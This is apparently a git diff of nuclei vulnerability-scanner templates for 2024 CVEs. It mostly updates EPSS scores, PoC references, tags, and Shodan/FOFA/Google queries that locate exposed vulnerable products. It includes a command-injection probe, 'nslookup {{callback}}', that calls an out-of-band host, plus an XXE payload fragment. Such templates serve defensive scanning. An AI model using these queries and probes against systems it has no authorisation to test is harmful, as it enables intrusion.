https://nvd.nist.gov/vuln/detail/CVE-2024-0195 + - https://vuldb.com/?ctiid.249510 + - https://github.com/Tropinene/Yscanner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 - epss-score: 0.00107 - epss-percentile: 0.43423 + epss-score: 0.89846 + epss-percentile: 0.98769 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,6 @@ info: product: spider-flow fofa-query: app="SpiderFlow" tags: cve,cve2024,spiderflow,crawler,unauth,rce - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index da0e5881ed..c4ccc716c1 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -17,17 +17,16 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0200 cwe-id: CWE-470 - epss-score: 0.0037 - epss-percentile: 0.72517 + epss-score: 0.06844 + epss-percentile: 0.93885 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: + verified: true vendor: github product: enterprise_server shodan-query: title:"GitHub Enterprise" fofa-query: app="Github-Enterprise" - verified: true tags: cve,cve2024,rce,github,enterprise - variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index c32fd0979b..e115c0cad5 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 fofa-query: app="GoAnywhere-MFT" zoomeye-query: app:"Fortra GoAnywhere-MFT" - tags: cve,cve2024,auth-bypass,goanywhere + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere http: - method: GET diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 27b99e3c20..9cc96e8257 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -29,6 +29,7 @@ info: shodan-query: vuln:CVE-2023-2796 fofa-query: wp-content/plugins/eventon/ publicwww-query: "/wp-content/plugins/eventon/" + google-query: inurl:"/wp-content/plugins/eventon/" tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan http: diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 9305b5e307..bc5222aad8 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-0305 - epss-score: 0.00796 - epss-percentile: 0.81232 + epss-score: 0.00947 + epss-percentile: 0.83122 cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: product: ncast fofa-query: app="Ncast-产品" && title=="高清智能录播系统" zoomeye-query: title:"高清智能录播系统" + shodan-query: http.title:"高清智能录播系统" + google-query: intitle:"高清智能录播系统" tags: cve,cve2024,ncast,rce http: diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 71b6600db2..285109fd1a 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 publicwww-query: inurl:"/wp-content/plugins/travelpayouts" - tags: cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts http: - method: GET diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 3452a1685d..32c906a6af 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0352 cwe-id: CWE-434 - epss-score: 0.01029 - epss-percentile: 0.82231 + epss-score: 0.0086 + epss-percentile: 0.82263 cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: likeshop product: likeshop shodan-query: http.favicon.hash:874152924 + fofa-query: icon_hash=874152924 tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 67a8072a14..267c293698 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -24,6 +24,7 @@ info: vendor: monitorr product: monitorr fofa-query: "icon_hash=\"-211006074\"" + shodan-query: http.favicon.hash:"-211006074" tags: cve,cve2024,file-upload,intrusive,monitorr variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index d6858b9ce0..3bc25fe99d 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -30,6 +30,7 @@ info: vendor: ruifang-tech product: rebuild fofa-query: "icon_hash=\"871154672\"" + shodan-query: http.favicon.hash:"871154672" tags: cve2024,cve,rebuild,ssrf http: diff --git a/http/cves/2024/CVE-2024-1071.yaml b/http/cves/2024/CVE-2024-1071.yaml index 82c83ee6c6..efac84fdae 100644 --- a/http/cves/2024/CVE-2024-1071.yaml +++ b/http/cves/2024/CVE-2024-1071.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-1071 cwe-id: CWE-89 epss-score: 0.00063 - epss-percentile: 0.24988 + epss-percentile: 0.26569 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-1208.yaml b/http/cves/2024/CVE-2024-1208.yaml index ba10347dd8..d06d7ed936 100644 --- a/http/cves/2024/CVE-2024-1208.yaml +++ b/http/cves/2024/CVE-2024-1208.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1208 - epss-score: 0.01024 - epss-percentile: 0.83462 + epss-score: 0.01217 + epss-percentile: 0.85275 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index dc369cfd47..46e4d49b37 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f813a21d-7a6a-4ff4-a43c-3e2991a23c7f/ - https://github.com/karlemilnikka/CVE-2024-1209 - https://nvd.nist.gov/vuln/detail/CVE-2024-1209 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7191955e-0db1-4ad1-878b-74f90ca59c91?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1209 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1210.yaml b/http/cves/2024/CVE-2024-1210.yaml index 9c975befa1..77adf5117c 100644 --- a/http/cves/2024/CVE-2024-1210.yaml +++ b/http/cves/2024/CVE-2024-1210.yaml @@ -11,10 +11,14 @@ info: - https://wpscan.com/vulnerability/f4b12179-3112-465a-97e1-314721f7fe3d/ - https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210 - https://nvd.nist.gov/vuln/detail/CVE-2024-1210 + - https://www.learndash.com/release-notes/ + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61ca5ab6-5fe9-4313-9b0d-8736663d0e89?source=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-1210 + epss-score: 0.01199 + epss-percentile: 0.85131 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +28,8 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sfwd-lms" google-query: inurl:"/wp-content/plugins/sfwd-lms" + shodan-query: http.html:/wp-content/plugins/sfwd-lms + fofa-query: body=/wp-content/plugins/sfwd-lms tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash http: diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index c46073a3cb..890f315b5a 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -15,19 +15,19 @@ info: - https://github.com/DiabloHTB/CVE-2024-1561 - https://nvd.nist.gov/vuln/detail/CVE-2024-1561 - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2 + - https://www.gradio.app/changelog#4-13-0 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-1561 cwe-id: CWE-29 - epss-score: 0.00045 - epss-percentile: 0.14639 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 3 shodan-query: html:"__gradio_mode__" tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr - flow: http(1) && http(2) && http(3) http: diff --git a/http/cves/2024/CVE-2024-1709.yaml b/http/cves/2024/CVE-2024-1709.yaml index 8b034b70f7..0b166ee532 100644 --- a/http/cves/2024/CVE-2024-1709.yaml +++ b/http/cves/2024/CVE-2024-1709.yaml @@ -11,11 +11,15 @@ info: - https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc - https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 - https://nvd.nist.gov/vuln/detail/CVE-2024-1709 + - https://github.com/rapid7/metasploit-framework/pull/18870 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2024-1709 - cwe-id: CWE-288 + cwe-id: CWE-288,NVD-CWE-Other + epss-score: 0.94464 + epss-percentile: 0.99213 + cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index d57dff21dd..4b386cd7ef 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -10,13 +10,15 @@ info: - https://jeva.cc/2973.html - https://nvd.nist.gov/vuln/detail/CVE-2024-20767 - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html + - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion + - https://github.com/Hatcat123/my_stars classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N cvss-score: 8.2 cve-id: CVE-2024-20767 cwe-id: CWE-284 - epss-score: 0.00087 - epss-percentile: 0.35684 + epss-score: 0.08221 + epss-percentile: 0.94345 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 4cb683498d..99bff48091 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -12,13 +12,15 @@ info: - https://github.com/advisories/GHSA-mqpq-2p68-46fv - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-21644 + - https://github.com/ltranquility/CVE-2024-21644-Poc + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-21644 cwe-id: CWE-284 - epss-score: 0.41231 - epss-percentile: 0.97205 + epss-score: 0.14751 + epss-percentile: 0.95779 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +29,8 @@ info: product: pyload shodan-query: html:"pyload" zoomeye-query: app:"pyLoad" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" tags: cve,cve2024,python,pip,pyload,access-control http: diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 78b42790ec..40f8b5da22 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -26,6 +26,9 @@ info: vendor: pyload product: pyload shodan-query: "title:\"pyload\"" + fofa-query: title="login - pyload" + google-query: intitle:"login - pyload" + zoomeye-query: app:"pyload" tags: cve,cve2024,pyload,authenticated,injection variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index aca95fbafd..ce5d967f29 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -20,10 +20,9 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: - fofa-query: app="ATLASSIAN-Confluence" verified: true + fofa-query: app="ATLASSIAN-Confluence" tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive - variables: username: "{{username}}" password: "{{password}}" diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 700c4f220d..2b72f878a0 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -16,15 +16,17 @@ info: cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 - epss-score: 0.97322 - epss-percentile: 0.99871 + epss-score: 0.97334 + epss-percentile: 0.99886 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" - tags: cve,cve2024,kev,rce,ivanti + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" + tags: packetstorm,cve,cve2024,kev,rce,ivanti http: - raw: diff --git a/http/cves/2024/CVE-2024-21893.yaml b/http/cves/2024/CVE-2024-21893.yaml index 0727b749b5..86e3acadc2 100644 --- a/http/cves/2024/CVE-2024-21893.yaml +++ b/http/cves/2024/CVE-2024-21893.yaml @@ -25,6 +25,8 @@ info: vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,kev,ssrf,ivanti http: diff --git a/http/cves/2024/CVE-2024-22024.yaml b/http/cves/2024/CVE-2024-22024.yaml index 2dd07ad283..75c51f20ac 100644 --- a/http/cves/2024/CVE-2024-22024.yaml +++ b/http/cves/2024/CVE-2024-22024.yaml @@ -18,8 +18,9 @@ info: vendor: ivanti product: connect_secure shodan-query: "html:\"welcome.cgi?p=logo\"" + fofa-query: body="welcome.cgi?p=logo" + google-query: intitle:"ivanti connect secure" tags: cve,cve2024,xxe,ivanti - variables: payload: ' %watchTowr;]>' diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index 71c5bc0edc..d2f4fe807d 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -11,8 +11,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-22319 cwe-id: CWE-74 - epss-score: 0.00283 - epss-percentile: 0.67752 + epss-score: 0.29329 + epss-percentile: 0.96896 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-22927.yaml b/http/cves/2024/CVE-2024-22927.yaml index e0131eacea..3da874ab23 100644 --- a/http/cves/2024/CVE-2024-22927.yaml +++ b/http/cves/2024/CVE-2024-22927.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2024-22927 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26844 + epss-score: 0.10809 + epss-percentile: 0.95082 cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:* metadata: vendor: eyoucms diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 7d39720ff7..8411fcbd94 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2024-2340 - epss-score: 0.00043 - epss-percentile: 0.08267 + epss-score: 0.00053 + epss-percentile: 0.21091 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-23917.yaml b/http/cves/2024/CVE-2024-23917.yaml index 1a387b8796..6ee3fb94af 100644 --- a/http/cves/2024/CVE-2024-23917.yaml +++ b/http/cves/2024/CVE-2024-23917.yaml @@ -22,8 +22,10 @@ info: max-request: 1 vendor: jetbrains product: teamcity + shodan-query: http.title:teamcity + fofa-query: title=teamcity + google-query: intitle:teamcity tags: cve,cve2024,auth-bypass,teamcity - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index 9cab50258d..1d53daef76 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -20,9 +20,11 @@ info: metadata: verified: true max-request: 1 - shodan-query: title:"SuperWebMailer" vendor: superwebmailer product: superwebmailer + shodan-query: title:"SuperWebMailer" + fofa-query: title="superwebmailer" + google-query: intitle:"superwebmailer" tags: cve,cve2024,superwebmailer,xss http: diff --git a/http/cves/2024/CVE-2024-24919.yaml b/http/cves/2024/CVE-2024-24919.yaml index 65c258a931..212090615c 100644 --- a/http/cves/2024/CVE-2024-24919.yaml +++ b/http/cves/2024/CVE-2024-24919.yaml @@ -10,12 +10,12 @@ info: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: + verified: true max-request: 1 vendor: checkpoint product: quantum_security_gateway - cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* shodan-query: html:"Check Point SSL Network" - verified: true + cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:* tags: cve,cve2024,checkpoint,lfi http: diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index 198d9060bc..f38f1da37a 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -9,6 +9,12 @@ info: reference: - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt - https://packetstormsecurity.com/files/cve/CVE-2024-25735 + - http://packetstormsecurity.com/files/177082 + - https://hyp3rlinx.altervista.org + - https://github.com/codeb0ss/CVE-2024-25735-PoC + classification: + epss-score: 0.00381 + epss-percentile: 0.72907 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index a2b5dd920f..f142818e0c 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -1,19 +1,25 @@ id: CVE-2024-26331 -info: - name: ReCrystallize Server - Authentication Bypass - author: Carson Chan - severity: high - description: | - This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. - reference: - - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ - metadata: - verified: true - max-request: 1 - shodan-query: title:"ReCrystallize" - tags: cve,cve02024,recrystallize,auth-bypass - +info: + name: ReCrystallize Server - Authentication Bypass + author: Carson Chan + severity: high + description: | + This vulnerability allows an attacker to bypass authentication in the ReCrystallize Server application by manipulating the 'AdminUsername' cookie. This gives the attacker administrative access to the application's functionality, even when the default password has been changed. + reference: + - https://preview.sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://sensepost.com/blog/2024/from-discovery-to-disclosure-recrystallize-server-vulnerabilities/ + - https://www.recrystallize.com/merchant/ReCrystallize-Server-for-Crystal-Reports.htm + - https://github.com/Ostorlab/KEV + classification: + epss-score: 0.00053 + epss-percentile: 0.21091 + metadata: + verified: true + max-request: 1 + shodan-query: title:"ReCrystallize" + tags: cve,cve02024,recrystallize,auth-bypass + http: - method: GET path: diff --git a/http/cves/2024/CVE-2024-27198.yaml b/http/cves/2024/CVE-2024-27198.yaml index fc07165948..16cc2426d8 100644 --- a/http/cves/2024/CVE-2024-27198.yaml +++ b/http/cves/2024/CVE-2024-27198.yaml @@ -26,6 +26,8 @@ info: vendor: jetbrains product: teamcity shodan-query: http.component:"TeamCity" + fofa-query: title=teamcity + google-query: intitle:teamcity tags: cve,cve2024,teamcity,jetbrains,auth-bypass,kev http: diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index 3c5c29ab95..6edaacd41d 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.9 cve-id: CVE-2024-27956 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.08203 + epss-score: 0.0005 + epss-percentile: 0.1901 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-28255.yaml b/http/cves/2024/CVE-2024-28255.yaml index 8ce2c581ea..5d6038443a 100644 --- a/http/cves/2024/CVE-2024-28255.yaml +++ b/http/cves/2024/CVE-2024-28255.yaml @@ -11,19 +11,19 @@ info: - https://github.com/open-metadata/OpenMetadata/blob/e2043a3f31312ebb42391d6c93a67584d798de52/openmetadata-service/src/main/java/org/openmetadata/service/security/JwtFilter.java#L113 - https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-6wx7-qw5p-wh84 - https://nvd.nist.gov/vuln/detail/CVE-2024-28255 + - https://github.com/wy876/wiki classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-28255 cwe-id: CWE-287 - epss-score: 0.00045 - epss-percentile: 0.12989 + epss-score: 0.00087 + epss-percentile: 0.36659 metadata: verified: true max-request: 1 shodan-query: http.favicon.hash:733091897 tags: cve,cve2024,openmetadata,rce,auth-bypass - variables: callback: "{{interactsh-url}}" cmd: "nslookup {{callback}}" diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index d7cb5481c3..6590760ff5 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -16,7 +16,7 @@ info: epss-percentile: 0.12994 metadata: max-request: 1 - tags: cve,cve2024,coda,xss + tags: packetstorm,cve,cve2024,coda,xss http: - raw: diff --git a/http/cves/2024/CVE-2024-2879.yaml b/http/cves/2024/CVE-2024-2879.yaml index 27dc05462e..a52bb5c2b4 100644 --- a/http/cves/2024/CVE-2024-2879.yaml +++ b/http/cves/2024/CVE-2024-2879.yaml @@ -3,7 +3,7 @@ id: CVE-2024-2879 info: name: WordPress Plugin LayerSlider 7.9.11-7.10.0 - SQL Injection author: d4ly - severity: critical + severity: high description: | The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. remediation: Fixed in 7.10.1 @@ -14,18 +14,21 @@ info: - https://layerslider.com/release-log/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3fddf96e-029c-4753-ba82-043ca64b78d3?source=cve classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2024-2879 cwe-id: CWE-89 - epss-score: 0.00043 - epss-percentile: 0.07687 + epss-score: 0.00492 + epss-percentile: 0.76133 + cpe: cpe:2.3:a:layerslider:layerslider:7.9.11:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 + vendor: layerslider + product: layerslider + framework: wordpress publicwww-query: "/wp-content/plugins/LayerSlider/" tags: cve,cve2024,wp-plugin,wp,wordpress,layerslider,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2024/CVE-2024-29059.yaml b/http/cves/2024/CVE-2024-29059.yaml index 359178ba06..92a8ee3e7e 100644 --- a/http/cves/2024/CVE-2024-29059.yaml +++ b/http/cves/2024/CVE-2024-29059.yaml @@ -9,18 +9,21 @@ info: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059 - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/ - https://github.com/codewhitesec/HttpRemotingObjRefLeak + - https://github.com/NaInSec/CVE-LIST + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-29059 - epss-score: 0.00043 - epss-percentile: 0.07503 + cwe-id: CWE-209 + epss-score: 0.01259 + epss-percentile: 0.85581 cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: 'Server: MS .NET Remoting' vendor: microsoft product: .net_framework + shodan-query: 'Server: MS .NET Remoting' tags: cve,cve2024,dotnet,microsoft,remoting,deserialization http: diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 50f03735cc..187f9319f2 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -9,10 +9,15 @@ info: reference: - https://github.com/wutalent/CVE-2024-29269/blob/main/index.md - https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b + - https://github.com/Ostorlab/KEV + - https://github.com/YongYe-Security/CVE-2024-29269 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-29269 + epss-score: 0.00054 + epss-percentile: 0.21518 metadata: max-request: 1 shodan-query: title:"Login to TLR-2005KSH" diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index 4c3d3c3a57..e8e1642a26 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -16,14 +16,16 @@ info: cvss-score: 5.3 cve-id: CVE-2024-3097 cwe-id: CWE-862 - epss-score: 0.00052 - epss-percentile: 0.19521 + epss-score: 0.04672 + epss-percentile: 0.92605 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: vendor: imagely product: nextgen_gallery framework: wordpress publicwww-query: "/wp-content/plugins/nextgen-gallery/" + shodan-query: cpe:"cpe:2.3:a:imagely:nextgen_gallery" + fofa-query: body=/wp-content/plugins/nextgen-gallery/ tags: cve,cve2024,wordpress,nextgen-gallery,wp-plugin,info-leak http: diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 1239487900..2e7bdcca6a 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -19,14 +19,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3136 - epss-score: 0.00045 - epss-percentile: 0.14274 + epss-score: 0.00065 + epss-percentile: 0.28259 metadata: - publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" verified: true max-request: 2 + publicwww-query: "/wp-content/plugins/masterstudy-lms-learning-management-system" tags: 